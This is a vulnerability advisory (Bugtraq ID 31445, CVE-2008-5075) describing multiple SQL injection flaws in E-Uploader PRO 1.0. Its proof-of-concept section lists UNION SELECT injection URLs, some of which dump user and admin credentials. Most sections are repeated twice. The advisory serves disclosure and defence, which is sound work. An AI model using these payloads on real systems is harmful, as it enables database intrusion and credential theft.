E-Uploader PRO 'id' Parameter Multiple SQL Injection Vulnerabilities
BID:31445
Info
E-Uploader PRO 'id' Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 31445 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-5075 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 27 2008 12:00AM |
| Updated: | May 07 2015 05:23PM |
| Credit: | ~!Dok_tOR!~ |
| Vulnerable: |
scriptsfrenzy.com E-Uploader Pro 1.0 |
| Not Vulnerable: | |
Discussion
E-Uploader PRO 'id' Parameter Multiple SQL Injection Vulnerabilities
E-Uploader PRO is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
E-Uploader PRO 1.0 is vulnerable; other versions may also be affected.
E-Uploader PRO is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
E-Uploader PRO 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
E-Uploader PRO 'id' Parameter Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following examples are available:
http://www.example.com/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,user,pass),3,4,5,6,7+from+users/*
http://www.example.com/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,admin_user,admin_pass),3,4,5,6,7+from+settings/*
http://www.example.com/[installdir]/img.php?id='+union+select+1,2,user()/*
http://www.example.com/[installdir]/file.php?id='+union+select+1,2,3/*
http://www.example.com/[installdir]/mail.php?id='+union+select+1,2,3/*
http://www.example.com/[installdir]/thumb.php?id='+union+select+1,2,user()/*
http://www.example.com/[installdir]/zip.php?id='+union+select+1,2,3/*
http://www.example.com/[installdir]/zipit.php?id='+union+select+1,2,3,4,5,6,7/*
Attackers can use a browser to exploit these issues.
The following examples are available:
http://www.example.com/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,user,pass),3,4,5,6,7+from+users/*
http://www.example.com/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,admin_user,admin_pass),3,4,5,6,7+from+settings/*
http://www.example.com/[installdir]/img.php?id='+union+select+1,2,user()/*
http://www.example.com/[installdir]/file.php?id='+union+select+1,2,3/*
http://www.example.com/[installdir]/mail.php?id='+union+select+1,2,3/*
http://www.example.com/[installdir]/thumb.php?id='+union+select+1,2,user()/*
http://www.example.com/[installdir]/zip.php?id='+union+select+1,2,3/*
http://www.example.com/[installdir]/zipit.php?id='+union+select+1,2,3,4,5,6,7/*
Solution / Fix
E-Uploader PRO 'id' Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
E-Uploader PRO 'id' Parameter Multiple SQL Injection Vulnerabilities
References:
References:
- E-Uploader pro Product Page (Scriptsfrenzy.com)